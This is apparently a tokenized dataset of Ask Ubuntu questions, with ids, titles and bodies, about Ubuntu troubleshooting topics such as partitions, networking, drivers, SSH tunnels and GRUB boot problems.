392571	how big is this disk , and do i actually have an additional 250gb i 'm not using ?	i have an old laptop that has been running ubuntu 10.04 since it was released , and i 've really forgotten all about it 's contents . i 'd like to avoid any downtime if possible , however i discovered the following output from fdisk -l disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00068a66 device boot start end blocks id system /dev/sda1 * 1 32 248832 83 linux partition 1 does not end on cylinder boundary . /dev/sda2 32 30402 243947521 5 extended /dev/sda5 32 30402 243947520 8e linux lvm the top part says 250gb quite clearly , but there seems to be sda2 and sda5 both seemingly holding ~243gb each . is this really just a 250gb drive or is there another partition i 'm simply not making use of ? here 's the contents of df -h fwiw : filesystem size used avail use % mounted on /dev/mapper/dandell-root 227g 121g 94g 57 % / none 491m 276k 491m 1 % /dev none 496m 0 496m 0 % /dev/shm none 496m 692k 495m 1 % /var/run none 496m 0 496m 0 % /var/lock none 496m 0 496m 0 % /lib/init/rw none 227g 121g 94g 57 % /var/lib/ureadahead/debugfs /dev/sda1 228m 36m 181m 17 % /boot i have no desire to maintain the partition , and would like to merge them . the server is headless so command-line only please : ) thanks for any advice ! update : ok i satisfied my curiosity that the drive is really only 250gb with sudo hdparm -i /dev/sda . however i 'm still interested to interpret the output of fdisk -l above ?
392573	how do i get vim to indent all html tags ?	i was using vim on debian 7 to edit an html document . i started typing : < html > return… after the initial return , the cursor was indented one level , so that as i typed < head > , and the rest of my document , it would show up like this : < ! doctype html > < html > < head > < meta charset= '' utf-8 '' > < title > test page < /title > < /head > < body > < div > < p > this is a paragraph. < /p > < /div > < /body > < /html > the tag on each line was simply followed by a return and no presses on the tab or space key , and vim formatted this as i expected . also , when typing the initial < / of a closing tag , vim would unindent that line so as to match the level of the corresponding opening tag . then , typing the same document into vim on ubuntu 13.10 , as i 'm typing the very same document in the same manner , i get the following results : < ! doctype html > < html > < head > < meta charset= '' utf-8 '' > < title > test page < /title > < /head > < body > < div > < p > this is a paragraph. < /p > < /div > < /body > < /html > notice that the indentation does n't start until the < p > tag , and i suppose any of its subsequent sibling and child elements . it seems that later versions of the html indentation style have opted to not indent tags such as html , head , body , etc. ( ? ) , for legibility . i do n't like the fact that vim does n't indent all tags . what can i do to change this ? i tried looking at the indentation files for the different versions , but i did n't manage to figure out if i could do anything there . pastebins : /usr/share/vim/vim73/indent/html.vim on debian 7 /usr/share/vim/vim74/indent/html.vim on ubuntu 13.10 i 'm using the following versions of vim : debian 7 : `` vi improved 7.3 ( 2010 aug 15 , compiled feb 10 2013 02:27:59 ) '' ubuntu 13.10 : `` vi improved 7.4 ( 2013 aug 10 , compiled aug 12 2013 00:28:05 ) ''
392578	help with chromium extension	in opera i use some scripts to change the style of webpages to improve readability after they have loaded . how can i implement these scripts in chromium using an extension , or can i make a extension which will do this ?
392579	force password change for windows users connecting to ubuntu 12.04 server	i have set up a shared drive on an ubuntu 12.04 server for users in a windows environment . i want the users to be forced to change their passwords upon their first login but when i use the sudo change -d 0 [ username ] command the users are not asked to change their password , they simply get an unable to connect message .
392580	how do i configure networkmanager to connect to two separate vpn servers simultaneously ?	i have to connect to two openvpn servers at once . how do i configure networkmanager to connect as a client to both ? -- < openvpn1 > -- < resource 1 > < laptop > - -- < openvpn2 > -- < resource 2 >
392582	hp envy 17 hybrid graphics support testing	i have an hp envy 17 that was overheating with the ubuntu 13.10 installation . it seems this fixed it for now : hp envy 6 amd overheating my question is how do we know when the hybrid graphics support will work ? in other words is there a sure fire way , outside of doing a fresh install and testing it ? tia , ole
392583	how to get scandinavian ää and öö working in alpine with terra terminal	i 've tried to get my font encoding to work without succes . i installed ubuntu 12.04 lts and i use email with ssh connection via basic terminal or terra . but when i 'm in my mail letters like ä and ö wo n't display correctly . i already tried to configure locales . when i change the character encoding in terminal it will change back to utf-8 when i launch it again . in terra i do n't even know how to approach this problem . what should i do ?
392587	permissions for /dev/snd/*	i tried to setup a very minimalistic ubuntu 13.10 system based on lxde . i just realized that my default user has no access to the sound hardware . digging around and comparing it to another ubuntu box with gnome-shell , i realized . the problem seems to be , that the user has no access to /dev/snd/* : getfacl /dev/snd/controlc0 # file : dev/snd/controlc0 # owner : root # group : audio user : :rw- group : :rw- other : : -- - on the gnome-box , this looks like that : getfacl /dev/snd/controlc0 # file : dev/snd/controlc0 # owner : root # group : audio user : :rw- user : christoph : rw- group : :rw- mask : :rw- other : : -- - i can fix this on the lxde-box , temporarily by sudo setfacl -m u : jukebox : rw /dev/snd/* but what i would love to understand is , which script or mechanism sets these permissions on my gnome-box , when i change from terminal to terminal .
392590	accidentally removed network-manager & xorg , reinstalling them does n't seem to fix it	i was doing a good deal of things today , when i accidentally ran the wrong command and things broke . it has been hard to figure out what caused what and for the sake of clarity , i am going to mention everything . firstly , i was trying to resize a partition adjacent to the main one , which failed , and upon boot , it could n't pick up the main partition . i got that fixed by chroot'in from a live usb and updating parameters for kernel or grub entry . before i did a reboot , i upgraded ubuntu too , to the latest kernel ( running 13.04 ) , all good on that end . after upgrading , i was trying to free up some space when i actually ran the incorrect wildcard command . command - http : //askubuntu.com/a/227551/8238 ( apt-get remove linux-image 3.0 . * linux-headers-3.0 . * ) i saw that it uninstalled a lot of other packages , and before i could do anything , network-manager was gone . i was n't sure if i use xorg , not sure what my system runs for display server . now on the next restart , i could n't boot cuz of resizing , so i used a live usb to fix that and install all the packages that were removed earlier accidentally . current situation : it boots up fine on the latest kernel till login , at which 1 ) no network devices are available ( only ethernet works in live usb , rfkill shows wifi & bluetooth are hard blocked , and of course the fn key is not working anymore , other fn keys indeed work ) 2 ) when i login , i get a blank screen , i am able to fire up a terminal and start programs with it but all of them appear as if display server is not running . exactly when unity ends , and how it looks before respawning ( i use unity , not gnome ) . guest account works fine , just reduced resolution , native resolution is not available to select . the machine is dell xps 15z , which has a graphics card but i neither know whether it 's drivers were running the display or open source one , nor know how to check . please advice .
392592	virtualbox 4.3 upgrade error on ubuntu 13.04	trying to upgrade from virtualbox 4.2 to 4.3 , receiving error '' breaks existing package 'virtualbox-4.2 ' that conflict : 'virtualbox ' ... ''
392594	juniper crashing right after launching	i am running ubuntu 13.10 x64 and have 64 and 32 bit versions of java 6 installed . i have it configured that when running network connect it will run the 32 bit version and for anything else the 64 bit version . i can get network connect to start when going to the site ( i have x32 versions of firefox and icedtea-plugin ) , but right after it launches it crashes . the timer on the network connect will sometimes goto 00:00:01 , but never to 00:00:02 before crashing . the error report : the crashed program seems to use third-party or local libraries : /home/user/.juniper_networks/network_connect/libncui.so it is highly recommended to check if the problem persists without those first . do you want to continue the report process anyway ? the error occurs with the 32 bit java , not with the 64 bit . i know that libncui.so is only 32 bit , but i do n't think that is the issue since i get the network connect gui when it launches . does anyone have a fix ?
392596	maas for deploying field machines	i 'm new here , so take it easy on me . i 'm looking to have a maas host that allows me to deploy an image onto laptops for field workers . can maas do that ? i saw that maas can be used to boot the machine over the network ( pxe ) , but i 'm not certain if it can do the following : machine plugged into network see that there is no os installed install my image onto it from there , the worker would then be able to take that laptop and begin using away from the network . also , how am i to deploy system wide upgrades so that all current machines get updated ? am i missing something here ? thank , danny
392599	how to reserve ip address in dhcp server	i install dhcp server with https : //help.ubuntu.com/lts/serverguide/dhcp.html but i need to make reserve ip addresses for specific machine ( 192.168.1.xxx ) and further to assign a name to each machine ( machine 1 machine 2 machine 3 ) . my configuration file is as follows . default-lease-time 600 ; max-lease-time 7200 ; subnet 192.168.1.0 netmask 255.255.255.0 { range 192.168.1.2 192.168.1.249 ; option routers 192.168.88.250 ; option domain-name-servers 192.168.1.x , 8.8.8.8 ; option domain-name `` mydomain.lan '' ; } this is to replace fortinet service and add hostnames for each ip assigned and have control of them . if there is any visual alternative ( via web ) to manage what i need , would be helpful .
392600	icon for customized ubuntu iso ?	when making customized ubuntu with ubuntu-builder , how can i change the icon of the iso , so when iso is burned on to the dvd , dvd would have my icon ?
392601	steam app lagging like crazy	so i 'm very new to ubuntu , so do n't put me into dumb situations or stuff , and sorry for bad english . my problem is that steam app is not working for me . it turns on pretty well and login is not lagging , but then i 'm in the app , everything is like 1fps , it 's impossible to do something e.g download the game , browse and chat , maybe there is a solution to fix the lag . what i did for optimizing ubuntu increased performance of dash home changed properly drivers installed maybe 2~4 apps optimized more with compiz pc specifications 1.73 ghz x2 intel cpu t2080 nvidia geforce 7600 go 2 gb ram ubuntu 13.10
392602	is this shadow file normal or hacked ?	i may have been hacked . this is most of my /etc/shadow file . i ca n't understand why so may items have a password hash of `` x '' . does `` x '' have a special meaning ? or is it really a hashed password , one that is extra , extra short , like i suppose a hacker might use ? daemon : x:15910:0:99999:7 : : : bin : x:15910:0:99999:7 : : : sys : x:15910:0:99999:7 : : : sync : x:15910:0:99999:7 : : : games : x:15910:0:99999:7 : : : man : x:15910:0:99999:7 : : : lp : x:15910:0:99999:7 : : : mail : x:15910:0:99999:7 : : : news : x:15910:0:99999:7 : : : uucp : x:15910:0:99999:7 : : : proxy : x:15910:0:99999:7 : : : www-data : ! x:15910:0:99999:7 : : : backup : x:15910:0:99999:7 : : : list : x:15910:0:99999:7 : : : irc : x:15910:0:99999:7 : : : gnats : x:15910:0:99999:7 : : : nobody : x:15910:0:99999:7 : : : libuuid : x:15910:0:99999:7 : : : bind : *:15910:0:99999:7 : : : fetchmail : *:15910:0:99999:7 : : : sshd : *:15910:0:99999:7 : : : syslog : *:15910:0:99999:7 : : : klog : *:15910:0:99999:7 : : : smmta : *:15910:0:99999:7 : : : smmsp : *:15910:0:99999:7 : : : mysql : ! :15916:0:99999:7 : : : messagebus : *:15940:0:99999:7 : : : usbmux : *:15940:0:99999:7 : : : many thanks for your help .
392605	google docs - fonts/look like windows	i recently installed ubuntu 13.10 for my home use and am really liking it so far . i use windows 7 on other computers and work together on google docs . when i log into a spreadsheet on my google docs on ubuntu , the font is really big and looks really ugly compared to on windows . i tried choosing a different font from the drop down but non helped the situation . i am using calibri 10 point on my google docs as it originated from an excel file a year or so ago . maybe this is part of my problem . i installed calibri font on ubuntu , but it still did not change the effect note , i did not yet try restarting the system after installing the fonts , so that might fix the problem . i just got on my windows pc now and remembered the problem , so figured i would ask the question .
392606	unable to find /var/lib/asterisk/agi-bin folder	i have installed asterisk using the below link http : //draalin.com/installing-asterisk-in-ubuntu/ but failed to find `` /var/lib/asterisk/agi-bin '' folder.i have searched a lot but could not find anything . any help would be appreciated regards : desperate
392608	ssh : can connect locally but not `` remotely ''	a bit of background : i 'm a ubuntu user for almost a year now . i had an old box lying around and decided to put it to some use . the first thing i wanted to do was set up ssh so that i can place it in a seperate location and connect to it via my laptop running ubuntu . os of server : ubuntu 12.04.3 lts os of laptop : ubuntu 12.04 lts ( the one trying to connect to the server with ) router : i 'm actually not sure . i have the bell canada router . so i try to login ssh using the internal ip success . great now i can see if it works with it 's public ip . i then try with the public ip and i get : ssh : connect to host [ something ] . [ something ] port [ something ] : connection refused ( i tried changing the default port using mapping to map a port i chose to port 22 on my local network ) so i tried reading but apart from making port forwarding i have n't found very helpeful articles . i have not set up a firewall ( yet ) i also tried doing vvv and all i get is [ user ] @ [ computer ] : ~ $ ssh -vvv -p [ customport ] [ user ] @ [ host ] openssh_5.9p1 debian-5ubuntu1.1 , openssl 1.0.1 14 mar 2012 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to [ host ] [ ipadress ] port [ customport ] . debug1 : connect to address [ ipadress ] port [ customport ] : connection refused ssh : connect to host [ host ] port [ customport ] : connection refused thanks in adance for any help you can give . please specify what information you need , if you need any more information
392612	black screen , blinking cursor	on wednesday the 11th , i shut down via the shut down option , on my laptop as i use it for work purposes , and left for the day . i went to turn on the laptop that thursday morning , to see that upon boot , my laptop went to the purple ubuntu screen with the dots underneath it , and then stalls with a black screen and blinking cursor in the top left corner . at first , i figured it was because i had accidentally forgotten the external hard drive was still plugged into my laptop . so i pulled out my external hard drive and alt+sysrq+reisub and rebooted my laptop . nothing , it still went to the black screen with blinking cursor in the top left corner . i tried rebooting with the grub and a previous version of ubuntu , and a newer version of ubuntu , and nothing still . this is my work laptop and i need that information that is on there ! i just do n't know what happened as i 'm still a beginner . if anyone is out there please let me know . one thing , will ubuntu stop loading if my memory is low ? i have an email i back up every month because of the fact i work in an ad agency and i get so many pdf proofs , invoices , sound clips and movie clips , that i have to back up that information monthly for it to not eat my memory . being december , my email traffic increases with the increased deadlines . does that have something to do with it ? edit : here 's a list of what happens when i boot , i have it starred where the black screen and blinking cursor falls . where i got this from , that advice did n't work . bios screen black with blinking cursor ( short ) . disk activity leds blink and flicker . purple without cursor ( long ) boot splash graphic ( via plymouth ) black screen ( short ) backlight may go off at this point . maybe more plymouth login screen . sound ( e.g . drums ) plays thank you in advanced , melinda
392613	different methods to install bitdefender antivirus scanner for unices	when i was searching for information about the bitdefender scanner for unices i found two different methods for installing the scanner in ubuntu 12.04 . number 1 and number 2 which should i use ? what advantages does the different methods have ? thanks in advance !
392614	why are newer firefox versions so bloated ? ( 30mb -- > 150mb )	i installed firefox 11 on my older machine and it consumes about 30 to 40 megabytes of ram . version 23 which was installed by default took at least 150mb . what is going on ? comparing them by functionality there does not seem to be a big difference . by the way , even version 17 needs about that much , so the problem does not lie at the particular 23rd version . but why is there so much more memory needed for the newer versions ?
392615	locale when login ubuntu 12.04 desktop	i logged in to ubuntu 12.04 desktop via ssh , the env variables of locale had been set are followed : env | grep lc lc_paper=zh_cn.utf-8 lc_address=zh_cn.utf-8 lc_monetary=zh_cn.utf-8 lc_numeric=zh_cn.utf-8 lc_telephone=zh_cn.utf-8 lc_identification=zh_cn.utf-8 lc_measurement=zh_cn.utf-8 lc_time=zh_cn.utf-8 lc_name=zh_cn.utf-8 so my question is : where set such env , and why lc_ctype and lc_messages not set ?
392616	win + d no longer brings me to dekstop screen	i 'm using ubuntu gnome 13.10 32-bit . i do n't know exactly how this happened but pressing super + d no longer minimises all my windows and brings me to desktop . instead , it opens the search box and searches for d ( experienced both on file manager and firefox ) . please help me correct this .
392618	making calls through the smartphone using the pc	is it possible to connect a smartphone through a usb cable to an ubuntu machine and make or receive phone calls to or from other phones using the desktop ? edit : this is not a voip based question . what i intend to ask is whether , making phone calls using the gsm / 3g network is possible .
392619	gpm package not available	i want to run mev ( on ubuntu 12.04 lts ) but it is part of the package gpm which i do n't have . i tried running : sudo apt-get install gpm and i get : reading package lists ... done building dependency tree reading state information ... done package gpm is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'gpm ' has no installation candidate it should be in the standard ubuntu sources as far as i know . it was listed in ubuntu software centre but failed to install . after an apt-get update it is now listed as `` missing '' in the software centre . any ideas ?
392623	ubuntu 13.10 crashing on macmini2013	i installed ubuntu 13.04 x86_64 on my macmini and it worked great ( graphic performance was way better than under osx ) . after upgrading to 13.10 , i have on average , one crash per day . the syslog entries are all over the place , from applications accessing invalid memory to cpu core code segfaulting . it ranges from applications freezing to the xserver restarting to a total system freeze . hardware does not seem to be the problem , since the machine runs fine on osx . i tried using a newer kernel ( 3.12 ) but still the same issues . booting 3.8 results in a frozen system when lightdm starts . is there any way to analyze this further ? i currently do n't know where to begin .
392629	xubuntu not recognizing printer	xubuntu does n't seem to be allowing me to print from my printer . when i try to print files i can only print to a file . however , ubuntu allows me to use the printer . lsusb ( on xubuntu box ) returns : bus 002 device 002 : id 03f0:2404 hewlett-packard deskjet f2280 series
392632	resize partitions in gparted	i 'm running linux and windows xp on the same hdd and my linux partition is very small . what i want to do is take about 10gb from any of the other partitions and add it to the linux one . my hard drive is currently a big mess but you can have a look at what it looks like in gparted here i 've tried following online tutorials but they all assume that the partitions that you are resizing are next to one another but this is not the case and i have no idea what i 'm supposed to be doing . i 'm not really fussed where i take the 10gb from , but i would ideally like to do it from sda6 since it has a bit more than any of the other drives . any advice would be appreciated . thanks
392637	how to sed two words in a line and add before and after ?	i was curious to know if there is a better way to sed two words and add a line before and after them . i learned how from grymoire but i wanted to know if there was a better way to do : # ! /bin/sh sed ' /foo/ , /bar/ { i\ add this line before a\ add this line after } ' what i am trying to do is find two words on one line , in this case foo and bar and then add something on the line before and the line after . if its not to much trouble or off-topic , can some recommend in the comments a few other sites to read on sed other than grymoire ?
392643	i ca n't - install broadcom sta wireless driver , connect to wifi , connect to ethernet wired connection	i bought a dell vostro 2520 two days back and when i clicked wifi icon to connect to my wifi network , i could n't see mine or any other wifi networks . so i then realized that i need to install a driver so that i can connect to my wifi network which is broadcom sta wireless driver . i tried activating it but then an error came on the screen that said sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log so then , i tried connecting to my wired connection . but there are a few problems . i clicked on ipv4 settings and set the method to automatic ( dhcp ) . i could get my ip address and my netmask but not my gateway address and my dns server . i tried getting my gateway address by terminal but all the answers were blank so i could n't get my gateway address . kernel ip routing table destination blank gateway blank flags metric ref use iface i also ca n't get my dns server cause i have no internet connection . i tried everything i googled to resolve this problem but nothing seems to work . all i 'm getting are errors . okay so now the wired connection shows that it 's connected but it 's not connected . i did the command @ chili555 told me to and here is what it says : 07:00.0 network controller [ 0280 ] : broadcom corporation bcm43142 802.11b/g/n [ 14e4:4365 ] ( rev 01 ) 09:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rt8111/8168/8411 pci express gigabit ethernet controller controller [ 10ec:8168 ] ( rev 07 ) now that my wired connection shows that it 's working but it 's not , i got my gateway address and my name server . i added them in my wired ipv4 settings . but my internet connection is n't working still . : ( update : yay ! it 's fixed ! ! wired and wireless connections are fixed ! thank you so much ! : d
392644	install program to home folder , not /	i want to install flightgear i understand i can install it by doing sudo apt-get install flightgear , etc . however , computer uses a ssd and a hdd , with my ssd being very limited . with flightgear being such a large game , it takes up several gig 's of my ssd , which is not going to work . my home folder is on my hdd , so i want to install it directly to /home/ $ user/flightgear/ how can i do this ? i would appreciate other ways too ( eg . aptitude , synaptic , dpkg ) edit : if you do ( for example ) sudo apt-get download chocolate-doom and then open the .deb with archive manager , you can extract the files and then use them . this works ... but seems like a big hack for something that should be simple to do ...
392645	utorrent installation strange error	so i tried to install utorrent , but i got one problem . so i extracted everything ok , but then i go to terminal and cd to the directory of the extraction point : d , and write `` ./utserver '' , nothing happens , what 's the deal here ? : o ubuntu 13.10
392646	lenovo usb monitor - lt1423p	morning all , i have recently aquired a usb lenovo monitor , lt1423p but it is not working in ubuntu 13.10 . i have read through the forums and googled like a madman and can find alot of information about displylink but nothing has helped so far . i have looked through this fix but have not had any luck . the screen goes straight into powersave mode after being plugged in , so no signal from os . the monitor is seen with lsusb : bus 002 device 004 : id 046d : c52b logitech , inc. unifying receiver bus 002 device 005 : id 090c:3261 silicon motion , inc. - taiwan ( formerly feiya technology corp. ) bus 002 device 006 : id 17e9:4322 displaylink bus 002 device 003 : id 0451:8043 texas instruments , inc . bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub and this is from dmesg : [ 5.558512 ] usb 2-1.1.2 : new high-speed usb device number 6 using ehci-pci [ 5.659538 ] usb 2-1.1.2 : new usb device found , idvendor=17e9 , idproduct=4322 [ 5.659545 ] usb 2-1.1.2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 5.659550 ] usb 2-1.1.2 : product : lenovo usb monitor [ 5.659554 ] usb 2-1.1.2 : manufacturer : displaylink [ 5.659557 ] usb 2-1.1.2 : serialnumber : 1s60a3uat2euvn244148 this is from the /var/log/syslog file : dec 18 13:13:16 project kernel : [ 3.123019 ] usb 2-1.1.4 : new usb device found , idvendor=090c , idproduct=3261 dec 18 13:13:16 project kernel : [ 3.123025 ] usb 2-1.1.4 : new usb device strings : mfr=1 , product=2 , serialnumber=3 dec 18 13:13:16 project kernel : [ 3.123029 ] usb 2-1.1.4 : product : lt1423p dec 18 13:13:16 project kernel : [ 3.123032 ] usb 2-1.1.4 : manufacturer : lenovo corporation dec 18 13:13:16 project kernel : [ 3.123035 ] usb 2-1.1.4 : serialnumber : aa00000000008208 dec 18 13:13:16 project kernel : [ 3.151905 ] fbcon : inteldrmfb ( fb0 ) is primary device dec 18 13:13:16 project kernel : [ 3.356899 ] console : switching to colour frame buffer device 240x67 dec 18 13:13:16 project kernel : [ 3.364591 ] i915 0000:00:02.0 : fb0 : inteldrmfb frame buffer device dec 18 13:13:16 project kernel : [ 3.364594 ] i915 0000:00:02.0 : registered panic notifier dec 18 13:13:16 project kernel : [ 3.385937 ] acpi : video device [ gfx0 ] ( multi-head : yes rom : no post : no ) dec 18 13:13:16 project kernel : [ 3.386248 ] input : video bus as /devices/lnxsystm:00/device:00/pnp0a08:00/lnxvideo:00/input/input2 dec 18 13:13:16 project kernel : [ 3.388397 ] [ drm ] initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 dec 18 13:13:16 project kernel : [ 3.388770 ] snd_hda_intel 0000:00:1b.0 : irq 51 for msi/msi-x dec 18 13:13:16 project kernel : [ 3.438105 ] input : hda intel pch hdmi/dp , pcm=7 as /devices/pci0000:00/0000:00:1b.0/sound/card0/input4 dec 18 13:13:16 project kernel : [ 3.438374 ] input : hda intel pch hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:1b.0/sound/card0/input3 any advice on how to get this screen working will be greatly appreciated , if you need more log info just let me know .
392647	what is the best setup for my laptop ?	i have a asus s56c here 's an overview of my hardware tell me if you can help . http : //imageshack.us/a/img706/8903/p58r.png i 'm really sick of windows .
392648	ca n't solve : ext4 file system creation failure ubuntu 12.04	this seems to have been covered a lot before , but none of the solutions seem to help . it 's the usual getting this error message while installing . the ext4 file system creation in partition # 1 of scsi1 ( 0,0,0 ) ( sda ) failed i 'm trying to install 12.04 on a brand new hdd in a reasonably old laptop though it should have plenty good enough specs . working from a usb drive which seems to be running ok . i 've tried formatting it , repartitioning it , checking it 's health with the smart diagnostics . if exhausted the something else option during the installation and have tried various suggestions using gparted . i 'm reasonably tech savvy , but also reasonable new to linux , though i have done installations before on virtual machines . i have access to another working windows machine , which i 'm writing this on , if that 's any use . i 've looked at and tried these threads and read others too : ubuntuforums.org answers.yahoo.com error : the ext4 file system creation in partition # 1 of scsi 1 0,0,0 sda failed however a lot of threads seem to either run dry , or the error is cause by a faulty hdd or other such reason . how to fix this ?
392649	ubuntu on hp touch pad	this question may have been asked a million times but i 'm looking for a simple answer , yes or no , can ubuntu be loaded ( and run ) on an hp touch pad and if yes , what version ? sorry if this seems a dumb question but i 'm not ubuntu knowledgable .
392651	internal microphone not working in 13.10	i upgraded to 13.10 on my thinkpad x201 and the internal mic stopped working . however if i plug an external mic it works well . lspci output : 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) any ideas ?
392653	ca n't install windows 8 , fedora 19 with ubuntu 12.04 lts . need help ... : ' (	i am new here , i want to install windows 8 , fedora 19 and ubuntu 12.04 lts on my laptop . which is dell inspiron 15r 7520 se . but whenever i install ubuntu after fedora , the grub is showing fedora is not installed . i 'd also tried to re-install grub using live cd of ubuntu but it leads me to some command page . do n't know what 's that . it 's really very frustrating . please help me friends.. i want these three on my laptop . i also want to know about grub customization but before that i want to triple boot my laptop . i 've tried many things to solve this issue but did n't find any perfect solution for this . please help me . : ' (
392656	how to do a full system backup	i have been looking around but i can not seem to find anything that will do a full system backup . programs like deja dup let you pick which folders to backup but i want the entire ubuntu os and everything on it backed up onto an external hard drive . there are probably ways to do it in the terminal but i do n't like to do those kind of things in the terminal and would rather have a gui for this . does anyone know of an application that can do full system backups and if so how ?
392658	dual boot problem windows 8 & ubuntu 12.04 cant boot into windows	i have installed ubuntu 12.04 on my laptop with windows 8 pre-installed . but when selecting windows 8 to boot i get following error : error : unknown command 'drivemap ' error : invalid efi filepath i ran boot-repair more than once . the output can be found here : http : //paste.ubuntu.com/6595378/ hope you can help me .
392662	how ca i enable port to be accessible on public ip	i have ubuntu server i am trying to the port 8550 to be accessible on the server public ip address , i can hit the web service running on that port from the server itself but not from the public ip address . running this netstat -anltp | grep `` 8550 '' the output is tcp 0 0 127.0.0.1:8550 0.0.0.0 : * listen 23961/python does this look right or the ip address should be 0.0.0.0:8550 if so how can i achieve that what should i add to the iptables ( i guess ) in order to enable this port publicly thanks
392664	how do i build mongodb with ssl support on saucy ?	the mongodb packages in ubuntu do not contain ssl support ( this is due to a restriction from 10gen , the makers of mongo ) . however , you 're supposed to be able to build it yourself ... but the instructions on mongo 's website do n't seem to work for saucy ( because of a newer gcc ) , and are n't clear on all the steps to enable ssl .
392666	`` some index files failed to download . they have been ignored , or old ones used instead . ''	i have ubuntu 13.10 installed as a dual boot system with windows 7 . ubuntu loads normally , but when i try to update with synaptic package manager , i get the following error message and the system stops there ... . failed to fetch http : //mirror.ox.ac.uk/sites/archive.ubuntu.com/ubuntu/dists/saucy/inrelease failed to fetch http : //mirror.ox.ac.uk/sites/archive.ubuntu.com/ubuntu/dists/saucy-updates/inrelease ( and other links listed too ! ) some index files failed to download . they have been ignored , or old ones used instead . what is wrong please ?
392673	ubuntu 13.10 dual monitor display radeon	i recently purchased an external monitor to use with my laptop for a dual screen setup . my laptop is an hp pavilion g6 and is running ubuntu 13.10 , along with the radeon graphics driver . i plug in the vga cable and then go to displays and my laptop detects the monitor as it should , however when i click apply , my laptop screen goes black and only the external monitor shows the screen , and then after a while it will revert back to normal , where the external monitor is black and my laptop shows the main screen . how can i make it so that they both run at the same time ? thanks also here is my line from doing lspci | grep vga if it helps at all : 00:01.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] sumo [ radeon hd 6480g ]
392676	how to connect ubuntu to university lan ( windows , static ips ) to use internet ?	i have always been a windows user , and this is the first time i have installed ubuntu 12.04 . after installing ubuntu , i am not being able to access college internet through my laptop . we have a wired network . all students have been provided with separate static ipv4 addresses like 192.168.0.xxx to access the college lan , and 192.168.0.10 for college net . macid registration was also done . we were given a port number to use for net connection . the subnet mask was 255.255.255.0 . these were the 'only ' settings i had to put for accessing the net connection and lan connection , and all the dns server , gateway , etc settings were left blank/not touched in the local area connection settings dialogue box . now that i have ubuntu , when i tried to play an mp3 file , it asked for net connection to download a plug-in . but it was unable to connect as perhaps i have entered the wrong settings , or i am missing out on some of them . i am not being able to figure out what settings must be put where and what should be put for dns server , gateway etc settings . asking my administrator was useless . he had never even heard of ubuntu , and advised me to revert back to windows . please help .
392679	within ubuntu , let virtual windows machine control the discrete graphics card	i have an asus n56vm with both onboard intel graphics ( hd3000 ) and a discrete nvidia card ( 630m ) . my main os is ubuntu 12.04 . i have vmware player installed and a windows 7 virtual machine running . i 'd like to give the windows virtual machine control over the discrete graphics card . that is , i want to run windows and its applications using the discrete card . right now i 'm using bumblebee to control the discrete card , so i invoked the player using optirun vmplayer . it runs fine , but i think it 's still using the integrated graphics : neither vmware nor windows seems to recognize the existence of the discrete card or of the hdmi output ( which is wired directly into the discrete card ) .
392684	ubuntu touch on nexus 7 testing	so here we are with nexus 7 to test ubuntu touch . i have specifically bought this tab for ubuntu touch . has anyone else installed and tested ubuntu touch on nexus 7 2012 . how stable is that ?
392686	ca n't boot into ubuntu even after reinstalling grub	i receive the message error : no such device : xxxxxx . grub rescue > _ i 've reinstalled grub numerous times using a live cd , using boot repair . i can boot into my system using super grub disk 2 and i 've reinstalled grub using rescatux it says the grub is intalled correctly but when i boot into my hard drive i still get the same error message this only happens with ubuntu 12.10 and up and i dont have windows installed in any other partition please help me i 've tried to solve it for several days to no avail .
392688	macbook pro 11,2 - no sound with ubuntu 13.10	the sound hardware works . i get the ding during boot up and if i boot to mac os , sound works . when i boot to ubuntu 13.10 , most everything works except there 's no sound . the headphone jack-light is red . the on-screen visuals seem to think the sound is turned up . i tried alsa 's mixer control and it thinks sound is on . but nothing comes out of speakers or headphones ( when they 're plugged in ) . this is a relatively new 11,2 macbook pro 15 '' with retina display .
392690	interacting with postgresql on remote server through ssh tunnel ?	i have user a setup on my webserver with it 's public ssh key copied over to user b 's ~/.ssh/authorized_keys over on my database server . the idea is to use an ssh tunnel to facilitate the communication between my web application and remote database . i 'm using ufw to lock down everything except ssh connections and port 5432 which postgresql uses for local connections : ufw default deny ufw allow ssh/tcp ufw allow 5432/tcp ufw enable here 's the command i use to open the ssh tunnel ( via web server ) : ssh -l 63333 : localhost:5432 userb @ 1.2.3.4 running netstat -lpnt | grep 63333 | grep ssh after the above command on my web server yields the following : tcp 0 0 127.0.0.1:63333 0.0.0.0 : * listen 22560/ssh tcp6 0 0 : :1:63333 : : : * listen 22560/ssh next i try and connect to the database server on port 63333 to verify that everything is working : psql -h localhost -p 63333 userb i 'm met with the following error message : -bash : /usr/bin/psql : no such file or directory is there something obvious that i 'm missing here ? i only have postgresql installed on the database server . from my understanding , once the tunnel is in place , and given the right parameters , should n't i have access to the interactive terminal ( psql ) ?
392691	wifi issue with after ubuntu install on nexus 4	cant connect phone with wifi . nexus 4 was updated to kitkat before ubuntu install read that this must be the problem with kitkats radio . how to flash android jelly bean radio as not to have wifi problem . thank you for your help . this is my first question apologies for any mistakes .
392693	system settings reports incorrect graphics driver in use	i have installed cedarview-graphics-drivers from additional drivers but system settings > details reports graphics driver to be gallium 0.4 on llvmpipe ( llvm 0x300 ) . why is it not showing cedarview-gfx or pvr-cdv ? is this an improper installation of drivers ? what steps should be taken ?
